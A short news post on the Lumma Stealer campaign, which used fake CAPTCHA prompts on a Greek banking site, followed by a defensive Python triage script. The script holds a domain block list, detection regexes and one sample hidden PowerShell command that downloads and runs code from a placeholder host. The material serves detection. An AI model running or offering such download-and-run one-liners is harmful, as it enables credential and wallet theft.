🏴‍☠️Greek banks’ negative experience🇬🇷: Lumma Stealer malware targets crypto wallet data via fake captchas

Morgan Ellis


A recent study by DNSFilter highlights the growing threat of fraudulent pages using deceptive “I am not a robot” prompts to distribute malware. Hackers have refined their ability to steal browser-stored credentials and crypto wallet data.

➡️ In Greece, users visiting an official banking site encountered a page mimicking a real CAPTCHA, which displayed a “DNS network error” message. They were instructed to press Windows + R, paste a command from the clipboard, and execute it. Approximately 17% of users complied.

➡️ Once executed, Lumma Stealer was installed stealthily outside the browser via PowerShell, while simultaneously performing DNS queries.

➡️ The malware scanned systems for monetizable information: browser passwords and cookies, 2FA tokens, cryptocurrency wallet data, remote access credentials, and even password manager vaults.

➡️ DNSFilter linked the attack to two domains: human-verify-7u.pages.dev, a Cloudflare Pages site returning an error after clicking, and recaptcha-manual.shop, which executes commands outside the browser once users follow the prompts.

➡️ Countermeasures: DNSFilter deployed content filtering and domain blocking tools within MSP networks. While partially effective, the rise of fileless malware remains a significant concern.
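
A defender-side triage sketch for the chain described above, added here as an example and not taken from DNSFilter or the original post: it flags Run-dialog history entries (the per-user RunMRU registry values, which Windows stores with a trailing `\1`) that launch a script interpreter with download or hidden-window traits, and DNS query names under the two domains named above. The function names, regex heuristics and sample data are assumptions constructed for illustration.

```python
import re

# Domains DNSFilter linked to the campaign (from the article above).
BLOCKED_DOMAINS = {"human-verify-7u.pages.dev", "recaptcha-manual.shop"}

# Interpreters commonly launched from a pasted Run-dialog command (assumed list).
INTERPRETER = re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I)
# Traits of a pasted download-and-run one-liner (assumed heuristics).
SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+h(idden)?|-e(nc(odedcommand)?)?\s|\biex\b|invoke-expression"
    r"|\biwr\b|invoke-webrequest|downloadstring|https?://)", re.I)


def domain_hit(qname):
    """Return the blocked domain that qname equals or is a subdomain of, else None."""
    name = qname.rstrip(".").lower()
    for d in BLOCKED_DOMAINS:
        if name == d or name.endswith("." + d):
            return d
    return None


def run_mru_hit(value):
    """Flag a RunMRU value that starts an interpreter with download/hidden traits."""
    cmd = value[:-2] if value.endswith("\\1") else value  # RunMRU appends '\1'
    return bool(INTERPRETER.search(cmd) and SUSPICIOUS.search(cmd))


def triage(run_mru_values, dns_qnames):
    """Return (source, value) pairs for every flagged RunMRU value and DNS name."""
    findings = [("runmru", v) for v in run_mru_values if run_mru_hit(v)]
    findings += [("dns", q) for q in dns_qnames if domain_hit(q)]
    return findings


# Constructed sample data: RunMRU values from one user hive and resolver query names.
SAMPLE_RUN_MRU = [
    "notepad\\1",
    "cmd\\1",
    'powershell -w hidden -c "iex (iwr https://example.invalid/v)"\\1',
]
SAMPLE_DNS = ["www.example.org.", "human-verify-7u.pages.dev.", "cdn.recaptcha-manual.shop"]

if __name__ == "__main__":
    for kind, value in triage(SAMPLE_RUN_MRU, SAMPLE_DNS):
        print(kind, value)
```

A RunMRU hit means the command was typed or pasted into the Run dialog by that user, which makes it a useful host-side complement to DNS blocking when the payload itself never touches disk.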

#news #crypto #Europe
